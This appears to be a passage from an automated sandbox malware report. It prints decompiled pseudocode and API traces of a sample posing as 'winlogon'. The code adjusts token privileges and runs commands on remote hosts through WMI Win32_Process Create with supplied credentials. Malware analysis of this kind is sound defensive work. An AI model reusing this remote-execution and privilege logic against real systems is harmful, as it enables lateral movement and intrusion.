    											asm("movq xmm0, [esp+0x2c]");
    											_v544 = 0;
    											_v556.PrivilegeCount = 1;
    											asm("movq [esp+0x44], xmm0");
    											_v544 = 2;
    											AdjustTokenPrivileges(_v580, 0,  &_v556, 0x10, 0, 0); // executed
    										}
    										_t65 = _t65 + 1;
    										_t70 = _t70 + 0xc;
    									} while (_t65 <  *_t54);
    								}
    							}
    							E00D7009A(_t54);
    							_t74 = _t74 + 4;
    						}
    					}
    					_t57 = _v576;
    					if(_t57 != 0xffffffff) {
    						CloseHandle(_t57);
    					}
    					return E00D6ABE4(_v12 ^ _t74);
    				} else {
    					return E00D6ABE4(_v8 ^ _t74);
    				}
			}

    APIs
    • GetCurrentProcess.KERNEL32(000F01FF,?), ref: 00D62BC1
    • OpenProcessToken.ADVAPI32(00000000), ref: 00D62BC8
    • GetTokenInformation.KERNELBASE(?,00000003(TokenIntegrityLevel),00000000,00000000,?), ref: 00D62C00
    • GetTokenInformation.KERNELBASE(?,00000003(TokenIntegrityLevel),00000000,?,?), ref: 00D62C30
    • LookupPrivilegeNameW.ADVAPI32(00000000,00000004,?,00000104), ref: 00D62C79
    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?,?,?,00000000,?,00000010,00000000,00000000), ref: 00D62CDA
    • CloseHandle.KERNEL32(FFFFFFFF), ref: 00D62D04
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
    Strings

    Control-flow Graph

    C-Code - Quality: 71%
    			E00D643A0(void* __ecx, void* __edi, void* __esi) {
    				signed int _v8;
    				struct _OSVERSIONINFOW _v284;
    				signed int _t10;
    				struct HINSTANCE__* _t18;
    				_Unknown_base(*)()* _t19;
    				void* _t32;
    				signed int _t33;
    
    				_t10 =  *0xd88004; // 0x276b9783
    				_v8 = _t10 ^ _t33;
    				_t32 = __ecx;
    				if(__ecx != 0) {
    					E00D6D520(__edi,  &(_v284.dwMajorVersion), 0, 0x110);
    					_v284.dwOSVersionInfoSize = 0x114;
    					if(GetVersionExW( &_v284) == 0 || _v284.dwMajorVersion < 6) {
    						goto L1;
    					} else {
    						_t18 = LoadLibraryW(L"shell32.dll");
    						if(_t18 == 0) {
    							goto L1;
    						} else {
    							_t19 = GetProcAddress(_t18, "SHGetKnownFolderPath");
    							if(_t19 == 0) {
    								goto L1;
    							} else {
    								 *_t19(0, 0, _t32); // executed
    								return E00D6ABE4(_v8 ^ _t33, 0xd7f2e0);
    							}
    						}
    					}
    				} else {
    					L1:
    					return E00D6ABE4(_v8 ^ _t33);
    				}
			}

    APIs
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
    • GetVersionExW.KERNEL32(00000114), ref: 00D643F2
    • LoadLibraryW.KERNEL32(shell32.dll), ref: 00D6440A
    • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 00D6441A
    • SHGetKnownFolderPath.SHELL32(00D7F2E0,00000000,00000000,?), ref: 00D6442E
    Strings
    C-Code - Quality: 91%
    			E00D65970(void* __ebx, void* __ecx, void* __edi, void* __esi) {
    				signed int _v8;
    				char _v264;
    				char _v1288;
    				void* _v1560;
    				struct _OSVERSIONINFOW _v1564;
    				void* _v1568;
    				char _v1572;
    				signed int _t40;
    				void* _t46;
    				signed int _t58;
    				signed int _t60;
    				signed int _t63;
    				signed int _t64;
    				signed int _t65;
    				signed int _t68;
    				signed int _t71;
    				signed int _t72;
    				signed int _t75;
    				char _t76;
    				void* _t78;
    				void* _t79;
    				void* _t83;
    				intOrPtr* _t87;
    				void* _t88;
    				signed int _t90;
    				int _t93;
    				intOrPtr* _t95;
    				signed int _t100;
    				int _t103;
    				intOrPtr* _t106;
    				void* _t108;
    				void* _t109;
    				signed int _t110;
    				void* _t111;
    				void* _t112;
    				signed int _t113;
    				void* _t114;
    				void* _t116;
    				signed int _t128;
    				void* _t130;
    				void* _t132;
    				void* _t133;
    				signed int _t134;
    
    				_t114 = __edi;
    				_t40 =  *0xd88004; // 0x276b9783
    				_v8 = _t40 ^ _t134;
    				_t130 = 0;
    				_t78 = __ecx;
    				E00D6D520(__edi,  &_v1564, 0, 0x114);
    				_v1564.dwOSVersionInfoSize = 0x114;
    				if(GetVersionExW( &_v1564) != 0) {
    					asm("sbb esi, esi");
    					_t130 = 1;
    				}
    				_v1568 = 0;
    				_t46 = E00D642C0( &_v1568, _t130, _t114); // executed
    				if(_t46 != 0) {
    					E00D6D520(_t114,  &_v1288, 0, 0x400);
    					_t131 = _v1568;
    					E00D6EAB8( &_v1288, _v1568, 0x3ff);
    					E00D7009A(_v1568);
    					_v1572 = 0;
    					E00D62D30( &_v1572, _t114, _v1568, __eflags); // executed
    					E00D6D520(_t114,  &_v264, 0, 0x100);
    					E00D6EAB8( &_v264, _v1572, 0xff);
    					E00D7009A(_v1572);
    					_t106 =  &_v264;
    					_v1568 = 0;
    					_t83 = _t106 + 1;
    					do {
    						_t58 =  *_t106;
    						_t106 = _t106 + 1;
    						__eflags = _t58;
    					} while (_t58 != 0);
    					_t60 = E00D65670(_t78,  &_v264, _t106 - _t83, _t114, _t131,  &_v1568);
    					__eflags = _t60;
    					if(_t60 == 0) {
    						goto L3;
    					} else {
    						_t87 =  &_v1288;
    						_t108 = _t87 + 1;
    						do {
    							_t63 =  *_t87;
    							_t87 = _t87 + 1;
    							__eflags = _t63;
    						} while (_t63 != 0);
    						_t88 = _t87 - _t108;
    						_push(_t114);
    						__eflags =  *((char*)(_t134 + _t88 - 0x505)) - 0x5c;
    						if( *((char*)(_t134 + _t88 - 0x505)) != 0x5c) {
    							_t128 =  &_v1288 - 1;
    							__eflags = _t128;
    							do {
    								_t75 =  *(_t128 + 1);
    								_t128 = _t128 + 1;
    								__eflags = _t75;
    							} while (_t75 != 0);
    							_t76 = "\\"; // 0x5c
    							 *_t128 = _t76;
    						}
    						_t109 = _v1568;
    						_t132 = _t109;
    						do {
    							_t64 =  *_t109;
    							_t109 = _t109 + 1;
    							__eflags = _t64;
    						} while (_t64 != 0);
    						_t110 = _t109 - _t132;
    						_t116 =  &_v1288 - 1;
    						__eflags = _t116;
    						do {
    							_t65 =  *(_t116 + 1);
    							_t116 = _t116 + 1;
    							__eflags = _t65;
    						} while (_t65 != 0);
    						_t90 = _t110 >> 2;
    						memcpy(_t116, _t132, _t90 << 2);
    						_t93 = _t110 & 0x00000003;
    						__eflags = _t93;
    						memcpy(_t132 + _t90 + _t90, _t132, _t93);
    						_t95 =  &_v1288;
    						_t111 = _t95 + 1;
    						do {
    							_t68 =  *_t95;
    							_t95 = _t95 + 1;
    							__eflags = _t68;
    						} while (_t68 != 0);
    						__eflags = _t95 - _t111 - 0x3ff;
    						if(_t95 - _t111 < 0x3ff) {
    							_t112 =  &_v1288;
    							_t133 = _t112;
    							do {
    								_t71 =  *_t112;
    								_t112 = _t112 + 1;
    								__eflags = _t71;
    							} while (_t71 != 0);
    							_t113 = _t112 - _t133;
    							_t79 = _t78 - 1;
    							asm("o16 nop [eax+eax]");
    							do {
    								_t72 =  *(_t79 + 1);
    								_t79 = _t79 + 1;
    								__eflags = _t72;
    							} while (_t72 != 0);
    							_t100 = _t113 >> 2;
    							memcpy(_t79, _t133, _t100 << 2);
    							_t103 = _t113 & 0x00000003;
    							__eflags = _t103;
    							memcpy(_t133 + _t100 + _t100, _t133, _t103);
    						}
    						__eflags = _v8 ^ _t134;
    						return E00D6ABE4(_v8 ^ _t134);
    					}
    				} else {
    					L3:
    					return E00D6ABE4(_v8 ^ _t134);
    				}
			}

    APIs
    • GetVersionExW.KERNEL32(00000114), ref: 00D659AF
      • Part of subcall function 00D642C0: CoTaskMemFree.OLE32(00000000), ref: 00D6434D
      • Part of subcall function 00D642C0: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002E,00000001), ref: 00D6438B
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
    • __Stoull.NTSTC_LIBCMT ref: 00D65A16
      • Part of subcall function 00D62D30: GetCurrentProcess.KERNEL32 ref: 00D62D75
      • Part of subcall function 00D62D30: OpenProcessToken.ADVAPI32(?,00000008,FFFFFFFF), ref: 00D62DA2
      • Part of subcall function 00D62D30: wsprintfW.USER32 ref: 00D62E8F
    • __Stoull.NTSTC_LIBCMT ref: 00D65A5B
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    C-Code - Quality: 55%
    			E00D64140(intOrPtr __ecx, int __edx, void* __esi) {
    				long* _v8;
    				intOrPtr _v12;
    				signed int _v20;
    				BYTE* _v24;
    				long** _t25;
    				int _t27;
    				signed int _t31;
    				int _t33;
    				intOrPtr _t35;
    				BYTE* _t41;
    				int _t43;
    				void* _t48;
    
    				_v12 = __ecx;
    				_t33 = __edx;
    				if(__ecx == 0 || __edx == 0) {
    					return 0;
    				} else {
    					_push(__edx);
    					_t41 = E00D702C9(__ecx);
    					_v24 = _t41;
    					if(_t41 != 0) {
    						_t25 =  &_v8;
    						_v8 = 0;
    						__imp__CryptAcquireContextW(_t25, 0, 0, 1, 0xf0000040); // executed
    						if(_t25 != 0) {
    							_t27 = CryptGenRandom(_v8, __edx, _t41);
    							CryptReleaseContext(_v8, 0);
    							if(_t27 != 0) {
    								if(_t33 != 0) {
    									_t35 = _v12;
    									_v20 = 0x19;
    									_t43 = _t33;
    									_t48 = _t41 - _t35;
    									do {
    										_t31 =  *(_t48 + _t35) & 0x000000ff;
    										_t35 = _t35 + 1;
    										 *((char*)(_t35 - 1)) = _t31 % _v20 + 0x61;
    										_t43 = _t43 - 1;
    									} while (_t43 != 0);
    									_t41 = _v24;
    								}
    								 *((char*)(_v12 + _t33)) = 0;
    							}
    						}
    						if(_t41 != 0xffffffff && _t41 != 0xcccccccc) {
    							E00D7009A(_t41);
    						}
    					}
    					return 0;
    				}
    			}

    APIs
    • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000040,?,?,?,00D63E8B), ref: 00D6418B
    • CryptGenRandom.ADVAPI32(00000000,00000003,00000000,00000000,?,?,?,00D63E8B), ref: 00D6419B
    • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,00D63E8B), ref: 00D641A8
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    APIs
      • Part of subcall function 00D74C37: GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,00D74EC5,00000006,FlsSetValue,00D80B4C,00D80B54,00000000,00000364,?,00D7202C,00000000), ref: 00D74C97
    • GetSystemTimeAsFileTime.KERNEL32(00000000,00D70075), ref: 00D74F36
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    C-Code - Quality: 100%
    			E00D6A6F0(long __ecx, void** __edx) {
    				void* _t4;
    				void* _t8;
    				void** _t9;
    
    				_t8 = __ecx;
    				_t9 = __edx;
    				if(__ecx == 0 || __edx == 0) {
    					L4:
    					return 0;
    				} else {
    					_t4 = RtlAllocateHeap(GetProcessHeap(), 8, __ecx); // executed
    					if(_t4 == 0) {
    						goto L4;
    					} else {
    						_t9[1] = _t8;
    						 *_t9 = _t4;
    						return 1;
    					}
    				}
    			}

    APIs
    • GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,00D6AB56,?,?,?,?,?,?,00D631A7,?), ref: 00D6A701
    • RtlAllocateHeap.NTDLL(00000000,?,?,?,?,?,?,00D631A7,?), ref: 00D6A708
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    C-Code - Quality: 100%
    			E00D6B598() {
    				_Unknown_base(*)()* _t1;
    
    				_t1 = SetUnhandledExceptionFilter(E00D6B5A4); // executed
    				return _t1;
    			}

    APIs
    • SetUnhandledExceptionFilter.KERNEL32(Function_0000B5A4), ref: 00D6B59D
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd

    Control-flow Graph for function d645d0 (legend: Executed / Not Executed; the rendered graph was not recoverable from the extracted page)
    C-Code - Quality: 25%
    			E00D645D0(void* __ebx, intOrPtr __ecx, char __edx, void* __edi, void* __esi, char _a4, char _a8, intOrPtr* _a12) {
    				long _v8;
    				char _v16;
    				signed int _v20;
    				short _v1060;
    				char _v2408;
    				char _v4460;
    				void* _v4464;
    				void* _v4468;
    				void _v4472;
    				void* _v4476;
    				void* _v4480;
    				void* _v4484;
    				void* _v4488;
    				intOrPtr _v4492;
    				void* _v4496;
    				void* _v4500;
    				long _v4504;
    				char _v4508;
    				long _v4512;
    				intOrPtr* _v4516;
    				intOrPtr _v4524;
    				char _v4532;
    				intOrPtr _v4540;
    				char _v4548;
    				short _v4556;
    				char _v4564;
    				intOrPtr _v4572;
    				char _v4580;
    				signed int _t145;
    				signed int _t146;
    				intOrPtr* _t149;
    				void* _t154;
    				void _t156;
    				intOrPtr _t159;
    				intOrPtr _t160;
    				void _t161;
    				intOrPtr _t162;
    				long* _t164;
    				void* _t172;
    				void* _t173;
    				void* _t174;
    				intOrPtr* _t175;
    				long _t177;
    				intOrPtr* _t181;
    				long _t186;
    				intOrPtr _t189;
    				void _t190;
    				intOrPtr* _t191;
    				void* _t192;
    				intOrPtr* _t195;
    				intOrPtr* _t197;
    				intOrPtr* _t199;
    				intOrPtr* _t201;
    				intOrPtr _t204;
    				intOrPtr* _t205;
    				void* _t206;
    				intOrPtr* _t210;
    				intOrPtr* _t212;
    				intOrPtr* _t214;
    				intOrPtr* _t218;
    				intOrPtr* _t220;
    				intOrPtr* _t231;
    				intOrPtr _t234;
    				intOrPtr _t238;
    				long _t248;
    				intOrPtr* _t250;
    				intOrPtr _t251;
    				intOrPtr* _t252;
    				intOrPtr* _t255;
    				void* _t261;
    				intOrPtr* _t262;
    				intOrPtr* _t266;
    				intOrPtr* _t278;
    				void _t283;
    				char _t294;
    				intOrPtr* _t296;
    				intOrPtr* _t298;
    				intOrPtr* _t299;
    				long _t300;
    				char _t302;
    				intOrPtr _t304;
    				void* _t305;
    				intOrPtr* _t306;
    				intOrPtr* _t308;
    				intOrPtr* _t309;
    				signed int _t310;
    				void* _t311;
    				void* _t312;
    				void* _t313;
    				void* _t314;
    
    				E00D7D900();
    				_t145 =  *0xd88004; // 0x276b9783
    				_t146 = _t145 ^ _t310;
    				_v20 = _t146;
    				 *[fs:0x0] =  &_v16;
    				_t302 = __edx;
    				_v4488 = __edx;
    				_v4492 = __ecx;
    				_t248 = 0;
    				_t294 = _a4;
    				_v4480 = _a8;
    				_t149 = _a12;
    				_v4484 = _t294;
    				_v4516 = _t149;
    				_v4512 = 0;
    				__imp__CoInitializeEx(0, 0, _t146, __edi, __esi, __ebx,  *[fs:0x0], E00D7E2DA, 0xffffffff); // executed
    				if(_t149 >= 0) {
    					__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 2, 0, 0, 0); // executed
    					if(_t149 >= 0 || _t149 == 0x80010119) {
    						_v4504 = _t248;
    						__imp__CredUIParseUserNameW(_t302,  &_v4460, 0x201,  &_v2408, 0x151); // executed
    						_t154 = LocalAlloc(0x40, 0x1c);
    						_t250 = __imp__#2;
    						_v4468 = _t154;
    						_t156 =  *_t250( &_v4460);
    						_v4472 = _t156;
    						_t304 =  *_t250(_t294);
    						_t159 =  *_t250( &_v2408);
    						_t296 = __imp__#7;
    						_t251 = _t159;
    						_t160 =  *_t296(_t304);
    						_t261 = _v4468;
    						 *((intOrPtr*)(_t261 + 0x10)) = _t304;
    						_t305 = _t261;
    						 *((intOrPtr*)(_t261 + 0x14)) = _t160;
    						_t161 = _v4472;
    						 *_t305 = _t161;
    						_t162 =  *_t296(_t161);
    						 *((intOrPtr*)(_t305 + 4)) = _t162;
    						 *((intOrPtr*)(_t305 + 8)) = _t251;
    						 *((intOrPtr*)(_t305 + 0xc)) =  *_t296(_t251);
    						_t164 =  &_v4504;
    						 *((intOrPtr*)(_t305 + 0x18)) = 2;
    						__imp__CoCreateInstance(0xd7f4b8, 0, 1, 0xd7f3e8, _t164); // executed
    						_t252 = __imp__#6;
    						if(_t164 >= 0) {
    							wsprintfW( &_v1060, L"\\\\%s\\root\\CIMV2", _v4492);
    							_t306 = __imp__#2;
    							_t312 = _t311 + 0xc;
    							_t172 =  *_t306( &_v1060);
    							_t297 = _t172;
    							_t173 =  *_t306(_v4488);
    							__imp__#2(_v4484);
    							_t262 = _v4504;
    							_v4464 = 0;
    							_t174 =  *((intOrPtr*)( *_t262 + 0xc))(_t262, _t172, _t173, _t173, 0, 0, 0, 0,  &_v4464);
    							_t252 = __imp__#6; // 0x76fd3f8a
    							_t305 = _v4468;
    							if(_t174 >= 0) {
    								__imp__CoSetProxyBlanket(_v4464, 0xffffffff, 0xffffffff, 0xffffffff, 6, 3, _t305, 0);
    								_t321 = _t174;
    								if(_t174 >= 0) {
    									_v4476 = 0;
    									_t308 = E00D6ABFA(_t252, _t262, _t297, _t305, _t321, 0xc);
    									_t313 = _t312 + 4;
    									_v4508 = _t308;
    									_v8 = 0;
    									if(_t308 == 0) {
    										_t308 = 0;
    										__eflags = 0;
    									} else {
    										 *((intOrPtr*)(_t308 + 4)) = 0;
    										 *(_t308 + 8) = 1;
    										 *_t308 = E00D6B9C0(_t252, _t297, _t308, "Select * From Win32_ProcessStopTrace");
    									}
    									_v8 = 0xffffffff;
    									_v4508 = _t308;
    									_t323 = _t308;
    									if(_t308 == 0) {
    										E00D6B9A0(0x8007000e);
    									}
    									_v8 = 1;
    									_t298 = E00D6ABFA(_t252, _t262, _t297, _t308, _t323, 0xc);
    									_t314 = _t313 + 4;
    									_v4472 = _t298;
    									_v8 = 2;
    									if(_t298 == 0) {
    										_t298 = 0;
    										__eflags = 0;
    									} else {
    										 *((intOrPtr*)(_t298 + 4)) = 0;
    										 *(_t298 + 8) = 1;
    										 *_t298 = E00D6B9C0(_t252, _t298, _t308, "WQL");
    									}
    									_v8 = 1;
    									_v4472 = _t298;
    									if(_t298 == 0) {
    										E00D6B9A0(0x8007000e);
    									}
    									_v8 = 3;
    									_t181 = _v4464;
    									 *((intOrPtr*)( *_t181 + 0x58))(_t181,  *_t298,  *_t308, 0x30, 0,  &_v4476);
    									_t57 = _t298 + 8; // 0x8
    									if(InterlockedDecrement(_t57) == 0) {
    										_t238 =  *_t298;
    										if(_t238 != 0) {
    											 *_t252(_t238);
    											 *_t298 = 0;
    										}
    										_t239 =  *((intOrPtr*)(_t298 + 4));
    										if( *((intOrPtr*)(_t298 + 4)) != 0) {
    											E00D6ABF5(_t239);
    											_t314 = _t314 + 4;
    											 *((intOrPtr*)(_t298 + 4)) = 0;
    										}
    										_push(0xc);
    										E00D6AC32(_t298);
    										_t314 = _t314 + 8;
    									}
    									_t60 = _t308 + 8; // 0x8
    									_v8 = 0xffffffff;
    									_t186 = InterlockedDecrement(_t60);
    									if(_t186 == 0) {
    										_t234 =  *_t308;
    										if(_t234 != 0) {
    											 *_t252(_t234);
    											 *_t308 = 0;
    										}
    										_t235 =  *((intOrPtr*)(_t308 + 4));
    										if( *((intOrPtr*)(_t308 + 4)) != 0) {
    											E00D6ABF5(_t235);
    											_t314 = _t314 + 4;
    											 *((intOrPtr*)(_t308 + 4)) = 0;
    										}
    										_push(0xc);
    										_t186 = E00D6AC32(_t308);
    									}
    									_t305 = _v4468;
    									__imp__CoSetProxyBlanket(_v4476, 0xffffffff, 0xffffffff, 0xffffffff, 6, 3, _t305, 0);
    									if(_t186 >= 0) {
    										_t266 = _v4476;
    										if(_t266 != 0) {
    											_t299 = __imp__#2;
    											_t189 =  *_t299(L"Create");
    											_v4492 = _t189;
    											_t190 =  *_t299(L"Win32_Process");
    											_t283 = _t190;
    											_v4488 = 0;
    											_t191 = _v4464;
    											_v4472 = _t283;
    											_t192 =  *((intOrPtr*)( *_t191 + 0x18))(_t191, _t283, 0, 0,  &_v4488, 0);
    											_t252 = __imp__#6;
    											if(_t192 >= 0) {
    												_t195 = _v4488;
    												_push(0);
    												_push( &_v4484);
    												_push(0);
    												_push(_v4492);
    												_v4484 = 0;
    												_push(_t195);
    												if( *((intOrPtr*)( *_t195 + 0x4c))() >= 0) {
    													_t199 = _v4484;
    													_push( &_v4496);
    													_v4496 = 0;
    													_push(0);
    													_push(_t199);
    													if( *((intOrPtr*)( *_t199 + 0x3c))() >= 0) {
    														_v4532 = 8;
    														_t204 =  *_t299(_v4480);
    														_v4524 = _t204;
    														_t205 = _v4496;
    														_t206 =  *((intOrPtr*)( *_t205 + 0x14))(_t205, L"CommandLine", 0,  &_v4532, 0);
    														_t309 = __imp__#9;
    														if(_t206 >= 0) {
    															_t212 = _v4464;
    															_push(0);
    															_push( &_v4480);
    															_push(_v4496);
    															_v4480 = 0;
    															_push(0);
    															_push(0);
    															_push(_v4492);
    															_push(_v4472);
    															_push(_t212);
    															if( *((intOrPtr*)( *_t212 + 0x60))() >= 0) {
    																_t214 = _v4480;
    																_push(0);
    																_push(0);
    																_push( &_v4580);
    																_push(0);
    																_v4508 = 0;
    																_push(L"ProcessId");
    																_push(_t214);
    																if( *((intOrPtr*)( *_t214 + 0x10))() >= 0) {
    																	_t255 = _v4516;
    																	_t300 = 0;
    																	do {
    																		_t220 = _v4476;
    																		 *((intOrPtr*)( *_t220 + 0x10))(_t220, 0xffffffff, 1,  &_v4500,  &_v4508);
    																		_t278 = _v4500;
    																		if(_t278 != 0) {
    																			 *((intOrPtr*)( *_t278 + 0x10))(_t278, L"ProcessId", 0,  &_v4548, 0, 0);
    																			if(_v4540 == _v4572) {
    																				_t231 = _v4500;
    																				_v4512 = 1;
    																				 *((intOrPtr*)( *_t231 + 0x10))(_t231, L"ExitStatus", 0,  &_v4564, 0, 0);
    																				_t300 = 1;
    																				 *_t255 = _v4556;
    																			}
    																			 *_t309( &_v4548);
    																			 *_t309( &_v4564);
    																			_t278 = _v4500;
    																		}
    																		 *((intOrPtr*)( *_t278 + 8))(_t278);
    																	} while (_t300 == 0);
    																	_t252 = __imp__#6;
    																}
    																 *_t309( &_v4580);
    																_t218 = _v4480;
    																 *((intOrPtr*)( *_t218 + 8))(_t218);
    															}
    														}
    														 *_t252(_v4524);
    														 *_t309( &_v4532);
    														_t210 = _v4496;
    														 *((intOrPtr*)( *_t210 + 8))(_t210);
    														_t305 = _v4468;
    													}
    													_t201 = _v4484;
    													 *((intOrPtr*)( *_t201 + 8))(_t201);
    												}
    												_t197 = _v4488;
    												 *((intOrPtr*)( *_t197 + 8))(_t197);
    											}
    											 *_t252(_v4492);
    											 *_t252(_v4472);
    											_t266 = _v4476;
    										}
    										 *((intOrPtr*)( *_t266 + 8))(_t266);
    									}
    								}
    								_t175 = _v4464;
    								 *((intOrPtr*)( *_t175 + 8))(_t175);
    								_t177 = _v4504;
    								 *((intOrPtr*)( *_t177 + 8))(_t177);
    							}
    						}
    						 *_t252( *((intOrPtr*)(_t305 + 8)));
    						 *_t252( *((intOrPtr*)(_t305 + 0x10)));
    						 *_t252( *_t305);
    						LocalFree(_t305);
    						_t248 = _v4512;
    					}
    					__imp__CoUninitialize();
    				}
    				 *[fs:0x0] = _v16;
    				return E00D6ABE4(_v20 ^ _t310);
    			}

    APIs
    • CoInitializeEx.OLE32(00000000,00000000), ref: 00D64635
    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 00D6464E
    • CredUIParseUserNameW.CREDUI(?,?,00000201,?,00000151,?,?,?,?,00D7E2DA,000000FF), ref: 00D64682
    • LocalAlloc.KERNEL32(00000040,0000001C,?,?,00000201,?,00000151,?,?,?,?,00D7E2DA,000000FF), ref: 00D6468C
    • SysAllocString.OLEAUT32(?), ref: 00D646A5
    • SysAllocString.OLEAUT32(?), ref: 00D646AE
    • SysAllocString.OLEAUT32(?), ref: 00D646B9
    • SysStringLen.OLEAUT32(00000000), ref: 00D646C4
    • SysStringLen.OLEAUT32(?), ref: 00D646DD
    • SysStringLen.OLEAUT32(00000000), ref: 00D646E6
    • CoCreateInstance.OLE32(00D7F4B8,00000000,00000001,00D7F3E8,?), ref: 00D64707
    • wsprintfW.USER32 ref: 00D6472D
    • SysAllocString.OLEAUT32(?), ref: 00D64743
    • SysAllocString.OLEAUT32(?), ref: 00D6474D
    • SysAllocString.OLEAUT32(?), ref: 00D64757
    • SysFreeString.OLEAUT32(?,00000000), ref: 00D64782
    • CoSetProxyBlanket.OLE32(00000000,000000FF,000000FF,000000FF,00000006,00000003,?,00000000), ref: 00D647AC
    • SysFreeString.OLEAUT32(?), ref: 00D64BC0
      • Part of subcall function 00D6B9C0: MultiByteToWideChar.KERNEL32(00000000,00000000,00D64853,00D64855,00000000,00000000,276B9783,00000000,00000000,76FD3F8A,Function_0000D240,00D86878,000000FE,?,00D64853,WQL), ref: 00D6BA3A
      • Part of subcall function 00D6B9C0: GetLastError.KERNEL32(?,00D64853,WQL,?,?), ref: 00D6BA49
      • Part of subcall function 00D6B9C0: __alloca_probe_16.NTDLLP ref: 00D6BA73
      • Part of subcall function 00D6B9C0: MultiByteToWideChar.KERNEL32(00000000,00000000,00D64853,?,00000000,00000000,?,?,?,?,?,00D64853), ref: 00D6BAD3
      • Part of subcall function 00D6B9C0: GetLastError.KERNEL32(?,?,?,?,?,00D64853), ref: 00D6BAEE
      • Part of subcall function 00D6B9C0: SysAllocString.OLEAUT32(00000000), ref: 00D6BB07
    • InterlockedDecrement.KERNEL32(00000008), ref: 00D64894
    • SysFreeString.OLEAUT32(00000000), ref: 00D648A5
    • InterlockedDecrement.KERNEL32(00000008), ref: 00D648DA
    • SysFreeString.OLEAUT32(00000000), ref: 00D648EB
    • CoSetProxyBlanket.OLE32(?,000000FF,000000FF,000000FF,00000006,00000003,?,00000000), ref: 00D6492E
    • SysAllocString.OLEAUT32(Create), ref: 00D64955
    • SysAllocString.OLEAUT32(Win32_Process), ref: 00D64962
    • SysAllocString.OLEAUT32(?), ref: 00D64A06
    • VariantClear.OLEAUT32(?), ref: 00D64B3D
    • VariantClear.OLEAUT32(?), ref: 00D64B46
    • VariantClear.OLEAUT32(?), ref: 00D64B69
    • SysFreeString.OLEAUT32(?), ref: 00D64B7D
    • VariantClear.OLEAUT32(?), ref: 00D64B86
    • SysFreeString.OLEAUT32(?), ref: 00D64BB8
    • SysFreeString.OLEAUT32(?), ref: 00D64BE9
    • SysFreeString.OLEAUT32(?), ref: 00D64BEE
    • SysFreeString.OLEAUT32(?), ref: 00D64BF2
    • LocalFree.KERNEL32(?,?,?,00000201,?,00000151,?,?,?,?,00D7E2DA,000000FF), ref: 00D64BF5
    • CoUninitialize.OLE32 ref: 00D64C01
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
